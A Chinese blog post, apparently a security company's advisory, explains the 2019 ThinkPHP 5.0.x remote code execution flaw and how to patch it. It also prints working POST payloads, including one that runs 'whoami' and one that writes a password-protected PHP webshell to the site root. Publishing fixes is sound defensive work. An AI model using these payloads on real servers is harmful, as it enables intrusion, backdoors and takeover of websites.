网站有漏洞被***该怎么解决和修复
2019年1月14日消息,thinkphp又被爆出致命漏洞,可以直接远程代码执行,getshell提权写入网站***到网站根目录,甚至直接提权到服务器,该漏洞影响版本ThinkPHP 5.0、ThinkPHP 5.0.10、ThinkPHP5.0.12、ThinkPHP5.0.13、ThinkPHP5.0.23、thinkphp 5.0.22版本。
***者可以伪造远程恶意代码,对服务器进行post提交数据来利用漏洞,该漏洞产生的原因是继上次2019元旦前后爆出的网站漏洞后,又一次的致命漏洞。在thinkphp目录下的library文件夹下的think\request.php代码。如下图所示:
从上述代码中可以看出整个代码写的流程,首先打开网站会从app.php代码里将请求的网站地址使用check来进行解析,然后再经过patch类型对其进行深度的赋值.然后可以使用post方式提交数据到_method函数当中去,框架会对进行判断,然后对其调用传入的参数值,经过整个代码的循坏以及传入,就可以导致request的值给覆盖掉,从而产生远程代码执行,我们来构造恶意的代码,看看漏洞是如何使用的。
post地址:anquan/public/index.php?s=captcha
POST内容:c=system&f=whoami&_method=filter
直接远程提交过去就会执行我们的命令 whoami。查看返回的post数据就可以看到我们要看的
信息。
在整体的所有版本中测试,thinkphp必须开启debug模式才可以写入webshell,写入的执行代码是:_method=construct&filter[]=assert&filter[]=file_put_contents('0.php',_decode
('JTNDJTI1ZXZhbCUyMHJlcXVlc3QlMjAlMjglMjJwYXNzJTIyJTI5JTI1JTNF'))&server=-1 写入的是一句话***,连接密码是pass.
有些低版本的网站,可以不使用captcha参数也可是执行远程代码,代码如下:_method=__construct&filter[]=system&method=GET&get[]=whoami
_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo
_method=__construct&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo
以上三个都是可以执行远程代码的。
关于thinkphp漏洞的修复建议:
尽快升级thinkphp到最新版本,有一些网站可能不方便升级,也可以对代码的文件进行修复,漏洞代码是library/think/Request.php对该代码的526行,527行进行添加设置白名单机制,对请求过来的数据,以及接收的数据进行安全限制。if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) {$this->method = $method,网站程序代码的安全很重要,如果网站使用了开源的CMS系统代码,不懂程序技术的话,网站会经常被******,如果自己懂程序,那就可以自己针对代码的漏洞进行漏洞修复,不懂的话,就请专业的网站安全公司来完善一下程序上的某些代码漏洞,国内像SINE安全、绿盟安全、启明星辰都是比较专业的安全公司,很多***之所以能植入***病毒,就是抓住了这些网站代码上的漏洞。
- 微软3个月没能修复零日漏洞被谷歌公布给黑客,发布攻击代码教人们怎么攻击
- win7默认网关不可用怎么修复 win7默认网关不可用的快速解决方法
- 怎么解决网站的大流量访问
- 通用网站系统漏洞及修复方法
- ***检测网站漏洞过程与修复方案
- 网站被攻击了怎么办?3种网站攻击的解决办法
- 检查Linux Bash安全漏洞以及各环境修复解决方法
- 发布到 Iss上的asp.net网站怎么报错?如何解决?
- 网站流量波动很大该怎么解决
- 网站漏洞修复方案防止SQL注入×××漏洞
- 网站漏洞检测及解决办法
- MyEclipse导入web项目,打开服务器后,在网站上运行中文乱码怎么解决
- 什么是网站死链?如何查询网站死链?网站死链怎么解决?
- asp 网站 XSS跨站脚本漏洞如何修复
- 网站被K怎么解决
- 网站怎么防止cc攻击,解决CC攻击的方法分享!
- 360网站安全提示"X-Frame-Options头未设置"怎么解决
- 编辑器漏洞致使网站被挂马该怎么办?
- 网站收录问题该怎么解决
- 网站漏洞解决-[轻微]WEB服务器启动了OPTIONS方法